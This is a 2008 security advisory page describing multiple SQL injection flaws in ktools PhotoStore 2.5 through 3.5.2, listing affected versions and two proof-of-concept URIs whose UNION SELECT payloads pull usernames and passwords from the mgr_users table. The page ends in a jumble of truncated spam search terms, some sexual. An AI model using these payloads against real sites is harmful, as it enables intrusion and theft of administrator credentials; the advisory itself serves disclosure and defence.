about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , Ktools PhotoStore Multiple SQL Injection Vulnerabilities


Title Ktools PhotoStore Multiple SQL Injection Vulnerabilities
Published 2008-05-10-12:00AM
Updated 2008-05-10-12:00AM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  DNX
Vulnerable  ktools PhotoStore 3.5.2
ktools PhotoStore 3.5.1
ktools PhotoStore 3.5
ktools PhotoStore 3.4.3
ktools PhotoStore 3.4.2
ktools PhotoStore 3.4
ktools PhotoStore 3.2.1
ktools PhotoStore 3.2
ktools PhotoStore 3.1.1
ktools PhotoStore 3.1
ktools PhotoStore 2.9.8
ktools PhotoStore 2.5
Not Vulnerable  
Code  Attackers can use a browser to exploit these issues.The following proof-of-concept URIs are available:http://www.example.com/photostore/about_us.php?gid=0'%20union%20select%201,concat(username,0x2f,password),3%20from%20mgr_users%20/* http://www.example.com/photostore/manager/image_details_editor.php?id=-1%20union%20select%201,2,3,4,5,6,7,8,9,username,11,12,13,password,15,16%20FROM%20mgr_users
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Sat, 22 Nov 2008 22:27:46 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c Crack Data inside edi NOT Null S CMS is Fre Www. Ayu a Sexevedeo Lapiz search/exp spice plat free sex m M600i Black lesb clip music news for C gaysex,vid www.yotub. www.sperms High schoo unexpected t527t mambo Remo hot sex pro fttpd Eassaiada YUOPORN.CO thrisha fu draugiem.l news/explo Priti zint news for c Sex.vadioe t960t khushbu se www+animal free sex m mambo Remo C languag WWW IAIAT Sex arabe. sXe Inject Naked cele mambo Remo x stat Free india lamalinks. dog bitch www.yotub. CMS is Fre news for c